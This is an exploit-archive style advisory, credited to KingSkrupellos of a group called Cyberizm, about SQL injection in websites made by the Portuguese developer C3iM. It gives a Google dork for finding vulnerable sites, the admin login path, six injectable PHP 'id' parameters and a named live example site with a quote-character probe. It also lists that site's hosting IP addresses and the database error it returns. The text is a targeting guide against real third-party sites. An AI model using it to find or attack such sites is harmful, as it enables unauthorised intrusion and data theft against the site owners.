Desenvolvido C3iM Portugal SQL Injection

1. #########################################################
2.  
3. # Exploit Title : Desenvolvido C3iM Portugal SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 17/01/2019
7. # Vendor Homepage : c3im.pt
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desenvolvido C3iM'' site:pt
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. #########################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19. /admin
20.  
21. # SQL Injection Exploit :
22. ***********************
23.  
24. /associados_id.php?id=[SQL Injection]
25.  
26. /conteudo.php?id=[SQL Injection]
27.  
28. /new.php?id=[SQL Injection]
29.  
30. /content.php?id=[SQL Injection]
31.  
32. /event.php?id=[SQL Injection]
33.  
34. /noticia.php?id=[SQL Injection]
35.  
36. #########################################################
37.  
38. # Example Vulnerable Site :
39. *************************
40.  
41. [+] danotec.pt/conteudo.php?id=1%27 =>
42.  
43. [ Proof of Concept ] => archive.is/BcJYk
44.  
45. Note : (192.185.106.107) => There are 104 domains hosted on this server.
46.  
47. Note : (192.185.86.89) => There are 174 domains hosted on this server.
48.  
49. #########################################################
50.  
51. # SQL Database Error :
52. **********************
53.  
54. You have an error in your SQL syntax; check the manual that
55. corresponds to your MySQL server version for
56. the right syntax to use near '\'' at line 1
57.  
58. #########################################################
59.  
60. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
61.  
62. #########################################################